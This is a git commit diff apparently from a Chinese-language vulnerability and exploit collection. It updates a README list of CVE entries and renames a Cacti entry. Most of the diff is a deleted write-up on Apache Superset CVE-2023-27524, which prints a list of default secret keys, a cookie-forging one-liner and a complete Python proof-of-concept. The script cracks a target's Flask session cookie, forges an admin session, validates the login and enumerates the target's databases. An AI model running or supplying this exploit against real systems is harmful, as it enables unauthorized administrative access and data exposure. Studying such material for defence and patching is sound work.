update

README.md

@@ -253,7 +253,8 @@
   * Apache Airflow 远程代码执行漏洞 CVE-2022-40127
   * Apache Airflow 默认密钥导致的权限绕过 CVE-2020-17526
   * Apache HertzBeat SnakeYaml 反序列化远程代码执行漏洞 CVE-2024-42323
-  * Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524
+  * Apache Superset Python Pickle 反序列化导致远程代码执行 CVE-2023-37941
+  * Apache Superset 硬编码 JWT 密钥导致认证绕过漏洞 CVE-2023-27524
   * Apache Unomi 远程表达式代码执行漏洞 CVE-2020-13942
   * Apache Zeppelin 未授权任意命令执行漏洞
   * Appspace jsonprequest SSRF漏洞 CVE-2021-27670
@@ -281,8 +282,10 @@
   * Atlassian Questions For Confluence 身份认证绕过漏洞 CVE-2022-26138
   * AVCON6 系统管理平台 download.action 任意文件下载漏洞
   * AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞
+  * Cacti graph_view.php SQL注入导致远程代码执行漏洞 CVE-2023-39361&CVE-2024-31459
+  * Cacti remote_agent.php 前台命令注入漏洞 CVE-2022-46169
+  * Cacti RRDTool 后台参数注入导致远程代码执行 CVE-2025-24367
   * Cacti SQL 注入漏洞 CVE-2020-14295
-  * Cacti 前台命令注入漏洞 CVE-2022-46169
   * CactiEZ weathermap 插件任意文件写入漏洞
   * Casbin get-users 账号密码泄漏漏洞
   * Casdoor static 任意文件读取漏洞
@@ -827,6 +830,8 @@
   * ThinkPHP5 5.0.22 5.1.29 远程代码执行漏洞
   * ThinkPHP5 5.0.23 远程代码执行漏洞
   * ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
+  * Vite 开发服务器任意文件读取漏洞 CNVD-2022-44615
+  * Vite 开发服务器任意文件读取漏洞绕过 CVE-2025-30208
   * XStream SSRF 反序列化漏洞 CVE-2020-26258
   * XStream 任意文件删除 反序列化漏洞 CVE-2020-26259
   * XStream 反序列化命令执行漏洞 CVE-2021-21351

Web应用漏洞/Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524.md

@@ -1,205 +0,0 @@
-# Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524
-
-## 漏洞描述
-
-Apache Superset 是一款现代化的开源大数据工具，也是企业级商业智能 Web 应用，用于数据探索分析和数据可视化。它提供了简单易用的无代码可视化构建器和声称是最先进的 SQL 编辑器，用户可以使用这些工具快速地构建数据仪表盘。CVE-2023-27524 中，未经授权的攻击者可根据默认配置的SECRET_KEY伪造成管理员用户访问Apache Superset。
-
-## 漏洞影响
-
-```
-Apache Superse <= 2.0.1
-```
-
-## QUAKE
-
-```
-app.name="Apache Superset"
-```
-
-## 漏洞复现
-
-登陆页面
-
-![image-20230504141719702](images/image-20230504141719702.png)
-
-漏洞修复补丁
-
-```
-https://github.com/apache/superset/pull/23186/files
-```
-
-![image-20230504142107277](images/image-20230504142107277.png)
-
-补丁代码中，新建了判断用户是否使用了默认的Key进行配置，如果为默认的Key，就直接中断启动,。但在 Docker的 env 下还是添加了固定的 Key: TEST_NON_DEV_SECRET
-
-![image-20230504142118809](images/image-20230504142118809.png)
-
-```
-# https://github.com/horizon3ai/CVE-2023-27524/blob/main/CVE-2023-27524.py
-SECRET_KEYS = [
-    b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h',  # version < 1.4.1
-    b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',          # version >= 1.4.1
-    b'thisISaSECRET_1234',                            # deployment template
-    b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',          # documentation
-    b'TEST_NON_DEV_SECRET'                            # docker compose
-]
-```
-
-以Docker下的环境举例
-
-![image-20230504142138933](images/image-20230504142138933.png)
-
-初次请求时会获取到 Cookie, 使用默认Key验证 Cookie是否可被伪造
-
-![image-20230504142150081](images/image-20230504142150081.png)
-
-登陆主页面观察主要参数
-
-![image-20230504142206013](images/image-20230504142206013.png)
-
-通过设置参数 user_id 和 _user_id 为 1 ,构造加密Cookie
-
-```
->>> from flask_unsign import session
->>> session.sign({'_user_id': 1, 'user_id': 1},'TEST_NON_DEV_SECRET')
-'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZE51uw.EdD7zSzojgY4keqZLOKR4GndJf8'
-```
-
-利用构造的 Cookie就可以获取到 Web后台管理权限, 后台中存在数据库语句执行模块，通过设置允许执行其他数据库语句后利用数据库语句 RCE
-
-![image-20230504142222421](images/image-20230504142222421.png)
-
-![image-20230504142234700](images/image-20230504142234700.png)
-
-## 漏洞POC
-
-```python
-from flask_unsign import session
-import requests
-import urllib3
-import argparse
-import re
-from time import sleep
-urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
-
-
-SECRET_KEYS = [
-    b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h',  # version < 1.4.1
-    b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',          # version >= 1.4.1
-    b'thisISaSECRET_1234',                            # deployment template
-    b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',          # documentation
-    b'TEST_NON_DEV_SECRET'                            # docker compose
-]
-
-def main():
-
-    parser = argparse.ArgumentParser()
-    parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)
-    parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')
-    parser.add_argument('--validate', '-v', help='Validate login', required=False, action='store_true')
-    parser.add_argument('--timeout', '-t', help='Time to wait before using forged session cookie, default=5s', required=False, type=int, default=5)
-    args = parser.parse_args()
-
-    try:
-        u = args.url.rstrip('/') + '/login/'
-
-        headers = {
-            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'
-        }
-
-        resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
-        if resp.status_code != 200:
-            print(f'Error retrieving login page at {u}, status code: {resp.status_code}')
-            return
-
-        session_cookie = None
-        for c in resp.cookies:
-            if c.name == 'session':
-                session_cookie = c.value
-                break
-
-        if not session_cookie:
-            print('Error: No session cookie found')
-            return
-
-        print(f'Got session cookie: {session_cookie}')
-
-        try:
-            decoded = session.decode(session_cookie)
-            print(f'Decoded session cookie: {decoded}')
-        except:
-            print('Error: Not a Flask session cookie')
-            return
-
-        match = re.search(r'&#34;version_string&#34;: &#34;(.*?)&#34', resp.text)
-        if match:
-            version = match.group(1)
-        else:
-            version = 'Unknown'
-
-        print(f'Superset Version: {version}')
-
-
-        for i, k in enumerate(SECRET_KEYS):
-            cracked = session.verify(session_cookie, k)
-            if cracked:
-                break
-
-        if not cracked:
-            print('Failed to crack session cookie')
-            return
-
-        print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')
-
-        try:
-            user_id = int(args.id)
-        except:
-            user_id = args.id
-
-        forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)
-        print(f'Forged session cookie for user {user_id}: {forged_cookie}')
-
-        if args.validate:
-            try:
-                headers['Cookie'] = f'session={forged_cookie}'
-                print(f'Sleeping {args.timeout} seconds before using forged cookie to account for time drift...')
-                sleep(args.timeout)
-                resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
-                if resp.status_code == 302:
-                    print(f'Got 302 on login, forged cookie appears to have been accepted')
-                    validated = True
-                else:
-                    print(f'Got status code {resp.status_code} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.')
-            except Exception as e_inner:
-                print(f'Got error {e_inner} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.')
-
-            if not validated:
-                return
-
-            print('Enumerating databases')
-            for i in range(1, 101):
-                database_url_base = args.url.rstrip('/') + '/api/v1/database'
-                try:
-                    r = requests.get(f'{database_url_base}/{i}', headers=headers, verify=False, timeout=30, allow_redirects=False)
-                    if r.status_code == 200:
-                        result = r.json()['result'] # validate response is JSON
-                        name = result['database_name']
-                        print(f'Found database {name}')
-                    elif r.status_code == 404:
-                        print(f'Done enumerating databases')
-                        break # no more databases
-                    else:
-                        print(f'Unexpected error: status code={r.status_code}')
-                        break
-                except Exception as e_inner:
-                    print(f'Unexpected error: {e_inner}')
-                    break
-
-
-    except Exception as e:
-        print(f'Unexpected error: {e}')
-
-
-if __name__ == '__main__':
-    main()
-```

Web应用漏洞/Cacti remote_agent.php 前台命令注入漏洞 CVE-2022-46169.md

@@ -1,4 +1,4 @@
-# Cacti 前台命令注入漏洞 CVE-2022-46169
+# Cacti remote_agent.php 前台命令注入漏洞 CVE-2022-46169
 
 Cacti是一个服务器监控与管理平台。在其1.2.17-1.2.22版本中存在一处命令注入漏洞，攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。